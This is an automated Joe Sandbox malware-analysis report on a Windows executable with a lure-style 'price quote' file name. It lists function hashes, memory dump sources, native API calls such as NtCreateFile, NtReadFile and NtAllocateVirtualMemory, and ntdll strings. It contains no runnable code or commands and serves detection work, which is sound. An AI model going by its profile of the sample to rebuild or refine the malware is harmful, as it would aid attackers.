Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 8a4b81dee60e84a86048b49fd61e296206073382e95fc8c32471cebbeef9f6a7
Instruction ID: 76b7c7861c70348207f95ebfa09ce80f14a6bf8c8c5ef9dfdb05ce84243fd9b4
Opcode Fuzzy Hash: 8a4b81dee60e84a86048b49fd61e296206073382e95fc8c32471cebbeef9f6a7
Instruction Fuzzy Hash: A94170B1D15A588BEB68CF67CC4479EFAF7BFC9201F14C1BA940DAA254DB7009858F10

Uniqueness

Uniqueness Score: -1.00%

Function 072E001E Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

N, xrefs: 072E014E

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 56e58ef9585c6f75085bb797a4136263b51b065ecb66fdb8e0e57b507a2a8ac3
Instruction ID: bbcc58b3d6ab95f172b7b4f6051a50e2418c48fbb21395cad3360ce1efd01a64
Opcode Fuzzy Hash: 56e58ef9585c6f75085bb797a4136263b51b065ecb66fdb8e0e57b507a2a8ac3
Instruction Fuzzy Hash: A14163B1D05A588BEB6CCF67CC4169AFAF7AFC5201F18C1BBC44CAA255EA7009858F11

Uniqueness

Uniqueness Score: -1.00%

Function 0B842E5E Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1500896761.000000000B840000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b840000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de03c43d7624496106df7a077b30029f97fb145a347fb46d48f85ff45fc78824
Instruction ID: 89295d0fa23daf6cc0116144eac6b768c260f8f82f8c26f64dd2a4c69a9bef20
Opcode Fuzzy Hash: de03c43d7624496106df7a077b30029f97fb145a347fb46d48f85ff45fc78824
Instruction Fuzzy Hash: 36E1A971B007098FDB1AEB79C8507AEB7F6AF89200F14846ED15ADB2A1DF34E805CB55

Uniqueness

Uniqueness Score: -1.00%

Function 072EA8F8 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9443f37eb8e76f0cbee8e3ea3c19de297d410aebe29420436f74b25ef65b3d37
Instruction ID: 6e9213bfb1ef3353db02307f84d1d4453345eebb20d9883c35d0834226e53bc8
Opcode Fuzzy Hash: 9443f37eb8e76f0cbee8e3ea3c19de297d410aebe29420436f74b25ef65b3d37
Instruction Fuzzy Hash: 43D1F93192075ACBCB01EBA4D8A46D9B7B1FF96310F50C79AD40A77214EF706AC8DB91

Uniqueness

Uniqueness Score: -1.00%

Function 072E76D0 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1500199900.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_72e0000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3619581b384183904fe61df7f7069bff2a011a8bfd8f8cbea9494a11e378ebc8
Instruction ID: 3edbf26f57b11c575a572c527a78bd444c30a33346b1fd1301ecdde804b7b8de
Opcode Fuzzy Hash: 3619581b384183904fe61df7f7069bff2a011a8bfd8f8cbea9494a11e378ebc8
Instruction Fuzzy Hash: 1B611D71910209CFE748EFBAE85179ABBF3BB99300F14C52AD014AB258DF745809EB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exePID: 8120, Parent PID: 7516COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	2.9%
Signature Coverage:	9%
Total number of Nodes:	210
Total number of Limit Nodes:	37

Executed Functions

Function 0041A3CA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415

Strings

bMA, xrefs: 0041A40D, 0041A414
bMA, xrefs: 0041A3F2, 0041A400
!JA, xrefs: 0041A3EC, 0041A3F8

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: 9a865595911a973b993ada0da04ee50112b10ac2bded73a8f33f2e7089ce9dc3
Instruction ID: ef3f69ae4ced17b59f1d63d52ef7afc07f48583aae48701ab65b53ba3eca626d
Opcode Fuzzy Hash: 9a865595911a973b993ada0da04ee50112b10ac2bded73a8f33f2e7089ce9dc3
Instruction Fuzzy Hash: 2FF0F9B6200108AFCB14CF99DC80EEB77A9EF8C354F158249FA0D97241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3D0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415

Strings

bMA, xrefs: 0041A40D, 0041A414
bMA, xrefs: 0041A3F2, 0041A400
!JA, xrefs: 0041A3EC, 0041A3F8

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 54437c4e75339082d0912fbe7e6c9053912bd6928cda1a9760da43cab1c95c7d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: C3F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241D630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A372 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Strings

IA, xrefs: 0041A39C, 0041A3A8

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: IA
API String ID: 823142352-3535198606
Opcode ID: 31f350fe8c91d1d8a055b2078919156a43ee1f04fbd4d8556c41b6a1a983717a
Instruction ID: da6b446b672395fc79eaa613d352eef11f3822fddd8a7d911c05c07b67ad652c
Opcode Fuzzy Hash: 31f350fe8c91d1d8a055b2078919156a43ee1f04fbd4d8556c41b6a1a983717a
Instruction Fuzzy Hash: CF1109B6200108AFCB08CF98DC94EEB77ADEF8C314F158249BA1C97240C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A320 Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A36D

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 30690d9e011530b668ed3b4ae7cc5c3fda29d367b226dbf4f68f65ca016a7565
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: FDF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A500 Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B0F4,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A539

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: c35769ceed384df61eeb5fc049e905e887b244236103aac277853e7772ac0dd9
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: 75F015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241C630F811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041A44A Relevance: 1.5, APIs: 1, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 24d1edc8bcd0f2e4fedbdf24ab54d21379c38c263f60307b9aef73831a0a549f
Instruction ID: 1eb2a7a616fa89feb2e5ddefd754459872c759f7f6989937ef7b8bae1351f6da
Opcode Fuzzy Hash: 24d1edc8bcd0f2e4fedbdf24ab54d21379c38c263f60307b9aef73831a0a549f
Instruction Fuzzy Hash: 06E0C27A200200BBD710EB94DD85EE73B59EF44364F01404ABA0CAB641C530EA108BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A450 Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: e48275ca6f7768b9f0fd4fab79f6d7fda959a909e55c262f35bdb2090c9231ed
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: E5D01776200214ABD710EB99DC85EE77BADEF48764F15449ABA189B242C530FA1086E0

Uniqueness

Uniqueness Score: -1.00%

Function 01A82BF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A82BFA

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0f60b44ed8f71e6955121a70f8f3348ad47989fd9b026e48dac8bafbc1fbb554
Instruction ID: 493efe054731b5d0f0854fad05369435dab8c6683b9181b067148f580e849ab7
Opcode Fuzzy Hash: 0f60b44ed8f71e6955121a70f8f3348ad47989fd9b026e48dac8bafbc1fbb554
Instruction Fuzzy Hash: 9490023120140C02D6807158440464A104597D2301F96C015A0029694DCA1D8B9977A5

Uniqueness

Uniqueness Score: -1.00%

Function 01A82DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A82DFA

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e575bb666509ee59db64d26738eb3fd2ccb8b008d892b529feb468c89c0fc3eb
Instruction ID: e403a9e6c8259bdcd8d88955f075ff044b2514a4a4dd0c7f9eda34cab668f357
Opcode Fuzzy Hash: e575bb666509ee59db64d26738eb3fd2ccb8b008d892b529feb468c89c0fc3eb
Instruction Fuzzy Hash: 4990023120140813D61171584504707104997D1241F96C412A0428598DD65E8A92A225

Uniqueness

Uniqueness Score: -1.00%

Function 01A82C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A82C7A

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ebf41711ab69426be560108d3aca7e0ac13e3187ba68fa77e87163429d03d1d
Instruction ID: af48b26413c0b1def8211dcbf877586b5a0f3a9b80b7e65f49f25b0c0fa564af
Opcode Fuzzy Hash: 1ebf41711ab69426be560108d3aca7e0ac13e3187ba68fa77e87163429d03d1d
Instruction Fuzzy Hash: 9D90023120148C02D6107158840474A104597D1301F5AC411A4428698DC69D89D17225

Uniqueness

Uniqueness Score: -1.00%

Function 00409AA0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52314f94f59daf452594b101418944989ba10d402b895cad4abe47703a5ce96b
Instruction ID: 4f20240aff7f2371bb6e5cfcebb6b85206ba00274494e6c7b70a30fa46eb6871
Opcode Fuzzy Hash: 52314f94f59daf452594b101418944989ba10d402b895cad4abe47703a5ce96b
Instruction Fuzzy Hash: 48213CB2D4420957CB25D664AD52BFF737CAB54314F04007FE949A3182F638BF498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A5F0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A61D

Strings

&EA, xrefs: 0041A612, 0041A61C

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: &EA
API String ID: 1279760036-1330915590
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 65e1271fa0e6f293e5ca7d904ec396d69fb6d51de338ced040ab1bfa87458b74
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 1DE012B2200208ABDB14EF99DC41EA777ADAF88668F118559BA085B242C630F9118AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A629 Relevance: 1.5, APIs: 1, Instructions: 28
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 46ca53a8907a118d21ea75e2734ee8029f0eadbc9dd25446a6c4feaed9e49d82
Instruction ID: 8c64177699e02e8ba0d93d30a4a4e9841d3ef1630be4e56b329564530a8e0cbb
Opcode Fuzzy Hash: 46ca53a8907a118d21ea75e2734ee8029f0eadbc9dd25446a6c4feaed9e49d82
Instruction Fuzzy Hash: 9FE06DBA1405086BDB14DF64DC85EE7776EEF84354F08828AFD085B242C635E854C6F0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A630 Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A65D

Memory Dump Source

Source File: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_IMG.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: a31e03847b69acb9206512889bce5d114748d47cfafea9ced6338f279cce3475
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 64E04FB12002046BD714DF59DC45EE777ADEF88754F014559FD0857241C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 01A82C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A82C24

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4a428ea13b27c3e8981faba2684c83b342906e5671c4206f3f47dc050f1ef4e2
Instruction ID: 22c75f3c652792d3a97e9e67193a5e197657b0887d40031026ca9eaa3c5f7b2d
Opcode Fuzzy Hash: 4a428ea13b27c3e8981faba2684c83b342906e5671c4206f3f47dc050f1ef4e2
Instruction Fuzzy Hash: AAB09B719015C5C5DF11F7644608737794077D1701F16C072D2434685F473CC5D1E275

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01AC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UseImpersonatedDeviceMap, xrefs: 01AC251C
GlobalFlag2, xrefs: 01AC2FC0
ShutdownFlags, xrefs: 01AC24A1
CFGOptions, xrefs: 01AC2967
DisableHeapLookaside, xrefs: 01AC246D
GlobalFlag, xrefs: 01AC2F3F, 01AC3059
MinimumStackCommitInBytes, xrefs: 01AC2BB0
MaxDeadActivationContexts, xrefs: 01AC2D82
ExecuteOptions, xrefs: 01AC25A0
RaiseExceptionOnPossibleDeadlock, xrefs: 01AC2579
LdrpInitializeExecutionOptions, xrefs: 01AC317D
MaxLoaderThreads, xrefs: 01AC24EC
TracingFlags, xrefs: 01AC2549
@, xrefs: 01AC2B74
DisableExceptionChainValidation, xrefs: 01AC275F
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01AC3176
UnloadEventTraceDepth, xrefs: 01AC24C0
minkernel\ntdll\ldrinit.c, xrefs: 01AC3187
@, xrefs: 01AC2942
FrontEndHeapDebugOptions, xrefs: 01AC2489

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 93fe4d7581d5b28b7683cf9874dc7becbfeb7cd3d8038a0e08f918a185c12c19
Instruction ID: 3da6eda00f90a0a4bb410192ffbb408a678373a3a8ba49d9db931e0229b23daa
Opcode Fuzzy Hash: 93fe4d7581d5b28b7683cf9874dc7becbfeb7cd3d8038a0e08f918a185c12c19
Instruction Fuzzy Hash: BC927071608342AFE721DF28C980B6BBBE8BF84B54F04491EFA95D7251D774E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01A78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 01AB5543
Critical section debug info address, xrefs: 01AB541F, 01AB552E
undeleted critical section in freed memory, xrefs: 01AB542B
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AB540A, 01AB5496, 01AB5519
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AB54CE
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01AB54E2
Address of the debug info found in the active list., xrefs: 01AB54AE, 01AB54FA
8, xrefs: 01AB52E3
Critical section address, xrefs: 01AB5425, 01AB54BC, 01AB5534
Thread identifier, xrefs: 01AB553A
Invalid debug info address of this critical section, xrefs: 01AB54B6
corrupted critical section, xrefs: 01AB54C2
double initialized or corrupted critical section, xrefs: 01AB5508
Critical section address., xrefs: 01AB5502

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 4f91956f2057960f04e840cd08b69efe1175dba2ccc9d3c61f3bba9eac8ed8ee
Instruction ID: c572e8aece1f9d406f9e53f011077c06c819ad1b8c8f46c7361b90929a5a87e6
Opcode Fuzzy Hash: 4f91956f2057960f04e840cd08b69efe1175dba2ccc9d3c61f3bba9eac8ed8ee
Instruction Fuzzy Hash: C0819CB1E41398BFEB20CF99C985BAEBBF9BB48714F144119F504B7252D3B9A940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01A729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 01AB259B
RtlpResolveAssemblyStorageMapEntry, xrefs: 01AB261F
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01AB24C0
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01AB2409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01AB25EB
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01AB2506
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01AB2498
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01AB2602
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01AB22E4
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01AB2624
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01AB2412

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: ae0939c5769eb5180dfb242fc9be2f83d4c0e4a8f24011bde938f4c49fb6efab
Instruction ID: 0b9287dfb1e8441911279ed0f7eff6818aed737364cf8ec0ac37623e5e234027
Opcode Fuzzy Hash: ae0939c5769eb5180dfb242fc9be2f83d4c0e4a8f24011bde938f4c49fb6efab
Instruction Fuzzy Hash: 9D025FB1D002699BDB31DB54CD80BEAB7B8AF54704F0441EBE649A7242DB31AF84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01AE8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

runtimebroker.exe, xrefs: 01AE8B73
services.exe, xrefs: 01AE8B96
SegmentHeap, xrefs: 01AE8BE9
lsass.exe, xrefs: 01AE8BA1
svchost.exe, xrefs: 01AE8B68
heapType, xrefs: 01AE8BCB
smss.exe, xrefs: 01AE8B8B
DefaultBrowser_NOPUBLISHERID, xrefs: 01AE8D00
csrss.exe, xrefs: 01AE8B80
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01AE8BD0

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 97f972a1d649c535eff4b2416f4ba415e11510be1dd8e62bf4fc36c38e235abf
Instruction ID: 7dc7b699e747207e3d337d3bacf6f31f6d5f87082ca2481d06a59646c6a6f976
Opcode Fuzzy Hash: 97f972a1d649c535eff4b2416f4ba415e11510be1dd8e62bf4fc36c38e235abf
Instruction Fuzzy Hash: 9551CD715043119FC32ADF588988BABBBECFFD9640F14491DEA99C3244E778D648CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01AF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 01AF02BF, 01AF0362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01AF04D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01AF06EA
HEAP[%wZ]: , xrefs: 01AF0399, 01AF04A8, 01AF05D0, 01AF0675, 01AF06CC
